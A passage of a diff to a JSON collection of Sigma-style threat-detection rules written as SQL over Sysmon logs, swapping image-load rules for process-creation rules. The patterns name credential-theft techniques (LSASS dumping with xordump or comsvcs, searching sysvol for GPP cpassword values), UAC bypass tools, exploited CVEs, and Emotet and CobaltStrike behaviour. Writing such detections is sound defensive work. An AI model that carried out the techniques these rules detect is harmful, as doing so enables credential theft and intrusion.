ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", "status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ "attack.execution", "attack.t1059" @@ -5770,34 +5598,40 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", - "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "status": "test", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", @@ -5808,977 +5642,973 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": "image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", - "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "status": "experimental", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Potential Wazuh Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Rarely observed" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 